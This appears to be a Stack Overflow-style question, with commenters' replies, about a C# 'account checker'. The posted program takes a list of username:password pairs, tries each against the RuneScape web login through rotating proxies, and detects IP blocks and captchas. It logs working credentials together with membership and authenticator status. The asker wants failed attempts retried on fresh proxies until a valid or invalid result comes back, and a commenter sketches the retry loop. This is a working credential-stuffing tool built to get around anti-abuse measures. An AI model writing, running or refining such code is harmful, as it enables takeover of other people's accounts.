# c# task on return condition

Tags: c#, multithreading, validation, task

The code below is my current working version of what needs to be done.

HOW THE PROGRAM CURRENTLY WORKS

(proxy.txt has 10 proxies)
(in.txt has 10 account data)

CURRENTLY WORKS:

proxy1 checks user1:data1, returns either of the following: (captcha, dead proxy, valid)

proxy2 checks user2:data2, returns either of the following: (captcha, dead proxy, valid)

HOW IT SHOULD WORK

### proxy1 checks user1:data1, returns either of the following: (captcha, dead proxy, valid)

### if proxy1 returns captcha/deadproxy continue with user1:data1 with proxy2 until valid result

### proxy2 checks user1:data1, returns either of the following: (captcha, dead proxy, valid)

### if (valid)

### continue to user2:data2

---

I am trying to make it so each account is checked with a working proxy without an error before switching to another account to check. right now the program will only do 1 attempt per 1 account no matter the response, I am trying to make it only go to the next account if (valid or invalid) returns in the result, how would I go about handling the task to be able to do this?

```
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Net;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Threading.Tasks;
using System.Management;
using System.Net.Sockets;

namespace ConsoleApplication1
{
    class Program
    {
        static void Main(string[] args)
        {
            string[] lines = File.ReadAllLines("C:\\checker/in.txt");
            string[] proxylines = File.ReadAllLines("C:\\checker/proxy.txt");
            var accCount = lines.Count();
            Console.Write("Accounts loaded: " + accCount);
            Console.WriteLine();
            var proxyCount = proxylines.Count();
            Console.Write("Proxies loaded: " + proxyCount);
            Console.WriteLine();

            var machine = System.Environment.MachineName;
            string HWID = string.Empty;//creating a empty string
            ManagementClass Management = new ManagementClass("win32_processor");//declaring the system management calss
            ManagementObjectCollection MObject = Management.GetInstances();//decalring the system management object collection 
            foreach (ManagementObject mob in MObject)//having a foreach loop
            {
                if (string.IsNullOrEmpty(HWID))
                {
                    HWID = mob.GetPropertyValue("processorID").ToString();//converting the HWID to string
                    break;
                }
            }

            Console.Write("Machine: " + machine);
            Console.WriteLine();
            Console.Write("HWID: " + HWID);
            Console.WriteLine();

            var checker = new Checker();
            //int hi = 0;

            var tasks =
                from x in lines.Select((line, index) => new { hi = index, line, proxy = proxylines[index % proxylines.Length]})
                let account = x.line.Split(new char[] { ':' })
                let user = account[0]
                let pass = account[1]
                select Task.Factory.StartNew(() => checker.checkAccount(user, pass, x.proxy, x.hi, accCount));

            Task.WaitAll(tasks.ToArray());

            Console.ReadLine();
        }

        public class Checker
        {

            public void checkAccount(string username, string password, string proxy, int i, int total)
            {
                //declare vars
                string getDisplayname = "";
                string getMember = "";
                string getAuth = "";
                string check = "";

                ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;

                byte[] data = Encoding.ASCII.GetBytes(
        $"username={username}&password={password}&mod=www&ssl=1&dest=account_settings.ws");

                string[] proxydata = proxy.Split(new[] { ":" }, StringSplitOptions.None);
                string proxyip = proxydata[0];
                int proxyport = Int32.Parse(proxydata[1]);

                try
                {
                    HttpWebRequest request = (HttpWebRequest)WebRequest.Create("https://secure.runescape.com/m=weblogin/login.ws");
                    WebProxy proxyLink = new WebProxy(proxyip, proxyport);
                    request.Method = "POST";
                    request.ContentType = "application/x-www-form-urlencoded";
                    request.ContentLength = data.Length;
                    request.Proxy = proxyLink;
                    using (Stream stream = request.GetRequestStream())
                    {
                        stream.Write(data, 0, data.Length);
                    }

                    string responseContent = null;

                    using (WebResponse response = request.GetResponse())
                    {
                        using (Stream stream = response.GetResponseStream())
                        {
                            using (StreamReader sr99 = new StreamReader(stream))
                            {
                                responseContent = sr99.ReadToEnd();
                            }
                        }
                    }

                    //parse blocked
                    string patternBlocked = @"You\s*have\s*been\s*blocked\s*from\s*logging\s*in";
                    string inputBlocked = responseContent;
                    Match matchBlocked = Regex.Match(inputBlocked, patternBlocked);
                    string blocked = matchBlocked.Value;

                    if (blocked == "You have been blocked from logging in")
                    {
                        Console.Write("["+i+" of "+total+"] IP BLOCKED: " + username + " (" + proxyip + ":" + proxyport + ")");
                        Console.WriteLine();
                        //return "captcha,captcha,captcha,captcha";
                    }
                    else
                    {
                        //parse captcha
                        string patternCaptcha = @"Please\s*complete\s*the\s*reCAPTCHA\s*box";
                        string inputCaptcha = responseContent;
                        Match matchCaptcha = Regex.Match(inputCaptcha, patternCaptcha);
                        string captcha = matchCaptcha.Value;

                        if (captcha == "Please complete the reCAPTCHA box")
                        {
                            captcha = "true";
                            Console.Write("["+i+" of "+total+"] Captcha: " + username + " (" + proxyip + ":" + proxyport + ")");
                            Console.WriteLine();
                            //return "captcha,captcha,captcha,captcha";
                        }
                        else
                        {
                            //parse valid/invalid
                            string patternCheck = @"Your\s*login\s*or\s*password\s*was\s*incorrect";
                            string inputCheck = responseContent;
                            Match matchCheck = Regex.Match(inputCheck, patternCheck);
                            check = matchCheck.Value;

                            if (check == "Your login or password was incorrect")
                            {
                                check = "Invalid";
                            }
                            else
                            {
                                check = "Valid";
                                //parse display name
                                string pattern = @"(<span.*class=.header-top__name.>(.*?)</span>)";
                                string input = responseContent;
                                Match match = Regex.Match(input, pattern);
                                getDisplayname = match.Groups[2].Value;
                                byte[] bytes = Encoding.Default.GetBytes(getDisplayname);
                                getDisplayname = Encoding.UTF8.GetString(bytes);
                                getDisplayname = getDisplayname.Replace("?", " ");

                                //parse member status
                                string patternMember = @"(Currently\s*Not\s*a\s*Member)";
                                string inputMember = responseContent;
                                Match matchMember = Regex.Match(inputMember, patternMember);
                                getMember = matchMember.Value;
                                if (getMember == "Currently Not a Member")
                                {
                                    getMember = "Non Member";
                                }
                                else
                                {
                                    getMember = "Member";
                                }

                                //parse auth status
                                string patternAuthUrl = @"iframe src=\""(.*?)""";
                                string inputAuthUrl = responseContent;
                                Match matchAuthUrl = Regex.Match(inputAuthUrl, patternAuthUrl);
                                string getAuthUrl = matchAuthUrl.Groups[1].Value;

                                try
                                {
                                    using (WebClient client = new WebClient())
                                    {
                                        string authSource = client.DownloadString(getAuthUrl);

                                        string patternAuth = @"RuneScape\s*Authenticator\s*is\s*disabled";
                                        string inputAuth = authSource;
                                        Match matchAuth = Regex.Match(inputAuth, patternAuth);
                                        getAuth = matchAuth.Value;

                                        if (getAuth == "RuneScape Authenticator is disabled")
                                        {
                                            getAuth = "Auth Disabled";
                                        }
                                        else
                                        {
                                            getAuth = "Authed";
                                        }
                                    }
                                }
                                catch (Exception ex)
                                {
                                    Console.Write("[" + i + " of " + total + "] Invalid auth url");
                                    Console.WriteLine();
                                }
                            }
                            captcha = "false";
                            //Console.Write(responseContent);
                            //Console.WriteLine();
                            if(check == "Valid")
                            {
                                string curldata = "[" + i + " of " + total + "] Valid: " + getDisplayname + "," + username + " " + password + "," + getMember + "," + getAuth + " (" + proxyip + ":" + proxyport + ")";
                                File.AppendAllText(@"valid.txt", curldata + Environment.NewLine);
                                Console.Write(curldata);
                                Console.WriteLine();

                                //remove account from in.txt
                                var tempFile = Path.GetTempFileName();
                                var linesToKeep = File.ReadLines("C:\\checker/in.txt").Where(l => l != username + ":" + password);
                                File.WriteAllLines(tempFile, linesToKeep);
                                File.Delete("C:\\checker/in.txt");
                                File.Move(tempFile, "C:\\checker/in.txt");
                            }
                            else
                            {
                                string curldata = "["+i+" of "+total+"] Invalid: " + username + " " + password + " (" + proxyip + ":" + proxyport + ")";
                                File.AppendAllText(@"invalid.txt", curldata + Environment.NewLine);

                                Console.Write(curldata);
                                Console.WriteLine();

                                //remove account from in.txt
                                var tempFile = Path.GetTempFileName();
                                var linesToKeep = File.ReadLines("C:\\checker/in.txt").Where(l => l != username + ":" + password);
                                File.WriteAllLines(tempFile, linesToKeep);
                                File.Delete("C:\\checker/in.txt");
                                File.Move(tempFile, "C:\\checker/in.txt");

                            }
                        }
                    }
                }
                catch (WebException) { Console.Write("["+i+" of "+total+"] Proxy did not work (" + proxyip + ":" + proxyport + ")"); Console.WriteLine(); }

            }

        }

    }
}
```

OTHER INFO

in.txt contains this data:

```
user1:display1
user2:display2
user3:display3
```

proxy.txt contains this data:

```
127.0.0.1:80
127.0.0.2:80
127.0.0.3:80
```

Comment: My first suggestion is to break up that `checkAccount` method. Also, it looks to me like your tasks are running concurrently, so your requirement to not start user2 before user1 is done seems impossible.

Comment: Ah, I dont mind which order they start, I just want to make sure user1 is processed if proxy returns bad/captcha, right now if proxy returns bad/captcha, it considered user1 "processed" and moves to next one. I merely want it to reprocess user1 with another proxy until valid/invalid.

Comment: Then my first suggestion is pertinent. Break up your code so you can more easily see what's happening. In particular, you want a loop that is essentially:  `do { isGood = tryProxy(...); } while (isGood == false || no more proxies);`